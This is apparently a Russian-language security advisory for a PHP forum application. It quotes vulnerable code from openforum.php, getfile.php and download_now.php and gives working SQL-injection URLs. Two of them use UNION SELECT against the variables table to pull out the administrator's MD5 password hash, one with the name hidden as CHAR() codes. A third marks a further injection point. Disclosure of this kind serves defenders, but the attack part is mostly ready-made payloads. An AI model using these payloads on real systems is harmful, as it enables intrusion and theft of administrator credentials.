Уязвимость:
В openforum.php линия 19:
....
$miestnost=mysql_fetch_array(mysql_query("SELECT id, nazov, editorid
FROM forum1cat WHERE id=$cat",$spojenie));
....
Параметр 'cat' должным образом не проверяется и вы может вставить
SQL-инъекцию независимо от magic_quoyes_gpc, например:
http://[цель]/[путь]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)
теперь вы видите MD5 хеш-пароль администратора...
В getfile.php:
....
include_once ("./register_globals.php");
if (!$cat) die ("Access denied");
include "admin/_dbase.conf.php";
$spojenie=mysql_pconnect
($conf_mysql_server,$conf_mysql_user_name,$conf_mysql_password);
mysql_select_DB ($conf_mysql_database_name);
include "class_configuration.php";
$configuration->ConfLoadDBtoPHP();
include "admin/_config.php";
echo "SELECT icon, icontype FROM prispevok1cat WHERE cat LIKE '$cat'
LIMIT 1";
$image=mysql_fetch_array(mysql_query("SELECT icon, icontype FROM
prispevok1cat WHERE cat LIKE '$cat' LIMIT 1", $spojenie));
if ($image) {
header ("Content-type: $image[icontype]");
echo $image[icon];
} else {
echo "Image not found";
}
....
Пример:
http://[цель]/[путь]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
В download_now.php линия 31-33:
....
$out=mysql_fetch_array(mysql_query("SELECT Count(id) FROM
downloadmanager WHERE id = ".$target,$spojenie));
if ($out[0]==1) {
$out2 = mysql_fetch_array(mysql_query("SELECT * FROM
downloadmanager WHERE id = $target",$spojenie));
....
Пример:
http://[цель]/[путь]/download_now.php?target=9999999999999[SQL]